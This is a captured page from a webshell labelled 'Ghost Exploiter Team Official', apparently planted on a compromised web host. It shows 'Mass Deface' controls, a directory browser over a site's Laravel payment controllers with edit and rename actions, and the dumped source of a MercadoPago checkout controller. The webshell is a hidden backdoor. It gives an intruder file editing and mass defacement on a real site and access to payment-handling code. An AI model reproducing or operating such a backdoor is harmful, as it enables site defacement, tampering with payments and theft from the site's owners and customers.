webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
app
/
Http
/
Controllers
/
Payment
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
AuthorizeController.php
10.244KB
edt
ren
FlutterwaveController.php
11.675KB
edt
ren
MercadopagoController.php
6.595KB
edt
ren
PaytmController.php
19.308KB
edt
ren
RazorpayController.php
11.555KB
edt
ren
SslCommerzController.php
10.408KB
edt
ren
<?php namespace App\Http\Controllers\Payment; use App\Helpers\EmailHelper; use App\Helpers\PriceHelper; use App\Helpers\SmsHelper; use App\Http\Controllers\Controller; use App\Models\Currency; use App\Models\Item; use App\Models\Notification; use App\Models\Order; use App\Models\PaymentSetting; use App\Models\PromoCode; use App\Models\Setting; use App\Models\ShippingService; use App\Models\State; use App\Models\TrackOrder; use Carbon\Carbon; use Illuminate\Http\Request; use Illuminate\Support\Facades\Auth; use MercadoPago; use Illuminate\Support\Facades\Session; use Illuminate\Support\Str; class MercadopagoController extends Controller { public function store(Request $request) { $input = $request->all(); $request->validate([ 'state_id' => State::whereStatus(1)->count() > 0 ? 'required' : '', ]); if (Session::has('currency')) { $currency = Currency::findOrFail(Session::get('currency')); } else { $currency = Currency::where('is_default', 1)->first(); } $supported = ['USD', 'NGN', 'BRL']; if (!in_array($currency->name, $supported)) { Session::flash('error', __('Currency Not Supported')); return redirect()->back(); } $data = PaymentSetting::whereUniqueKeyword('mercadopago')->first(); $paydata = $data->convertJsonData(); $user = Auth::user(); $setting = Setting::first(); $cart = Session::get('cart'); $total_tax = 0; $cart_total = 0; $total = 0; $option_price = 0; foreach ($cart as $key => $item) { $total += $item['main_price'] * $item['qty']; $option_price += $item['attribute_price']; $cart_total = $total + $option_price; $item = Item::findOrFail($key); if ($item->tax) { $total_tax += $item::taxCalculate($item); } } if (!PriceHelper::Digital()) { $shipping = null; }else{ $shipping = ShippingService::findOrFail($request['shipping_id']); } $discount = []; if (Session::has('coupon')) { $discount = Session::get('coupon'); } if (!PriceHelper::Digital()) { $shipping = null; } $grand_total = ($cart_total + ($shipping ? $shipping->price : 0)) + $total_tax; $grand_total = $grand_total - ($discount ? $discount['discount'] : 0); $grand_total += PriceHelper::StatePrce($request->state_id, $cart_total); $total_amount = PriceHelper::setConvertPrice($grand_total); $item_name = $setting->title . " Order"; $success_url = route('front.checkout.success'); MercadoPago\SDK::setAccessToken($paydata['token']); $payment = new MercadoPago\Payment(); $payment->transaction_amount = (string)$total_amount; $payment->token = $input['token']; $payment->description = $item_name; $payment->installments = 1; $payment->payer = array( "email" => EmailHelper::getEmail() ); $payment->save(); if ($payment->status == 'approved') { $orderData['state'] = $request['state_id'] ? json_encode(State::findOrFail($request['state_id']), true) : null; $orderData['cart'] = json_encode($cart, true); $orderData['discount'] = json_encode($discount, true); $orderData['shipping'] = json_encode($shipping, true); $orderData['tax'] = $total_tax; $orderData['state_price'] = PriceHelper::StatePrce($request['state_id'], $cart_total); $orderData['shipping_info'] = json_encode(Session::get('shipping_address'), true); $orderData['billing_info'] = json_encode(Session::get('billing_address'), true); $orderData['payment_method'] = 'Mercadopago'; $orderData['txnid'] = $payment->id; $orderData['user_id'] = isset($user) ? $user->id : 0; $orderData['payment_status'] = 'Paid'; $orderData['order_status'] = 'Pending'; $orderData['transaction_number'] = Str::random(10); $orderData['currency_sign'] = PriceHelper::setCurrencySign(); $orderData['currency_value'] = PriceHelper::setCurrencyValue(); $order = Order::create($orderData); $new_txn = $new_txn = 'ORD-' . str_pad(Carbon::now()->format('Ymd'), 4, '0000', STR_PAD_LEFT) . '-' . $order->id; $order->transaction_number = $new_txn; $order->save(); PriceHelper::Transaction($order->id, $order->transaction_number, EmailHelper::getEmail(), PriceHelper::OrderTotal($order, 'trns')); PriceHelper::LicenseQtyDecrese($cart); PriceHelper::LicenseQtyDecrese($cart); if (Session::has('copon')) { $code = PromoCode::find(Session::get('copon')['code']['id']); $code->no_of_times--; $code->update(); } TrackOrder::create([ 'title' => 'Pending', 'order_id' => $order->id, ]); Notification::create([ 'order_id' => $order->id ]); if ($setting->is_twilio == 1) { // message $sms = new SmsHelper(); $user_number = json_decode($order->billing_info, true)['bill_phone']; if ($user_number) { $sms->SendSms($user_number, "'purchase'", $order->transaction_number); } } $emailData = [ 'to' => EmailHelper::getEmail(), 'type' => "Order", 'user_name' => isset($user) ? $user->displayName() : Session::get('billing_address')['bill_first_name'], 'order_cost' => $total_amount, 'transaction_number' => $order->transaction_number, 'site_title' => Setting::first()->title, ]; $email = new EmailHelper(); $email->sendTemplateMail($emailData); if ($discount) { $coupon_id = $discount['code']['id']; $get_coupon = PromoCode::findOrFail($coupon_id); $get_coupon->no_of_times -= 1; $get_coupon->update(); } Session::put('order_id', $order->id); Session::forget('cart'); Session::forget('discount'); Session::forget('coupon'); return redirect($success_url); } else { return redirect()->route('front.checkout.cancle')->withError('Payment Failed'); } } }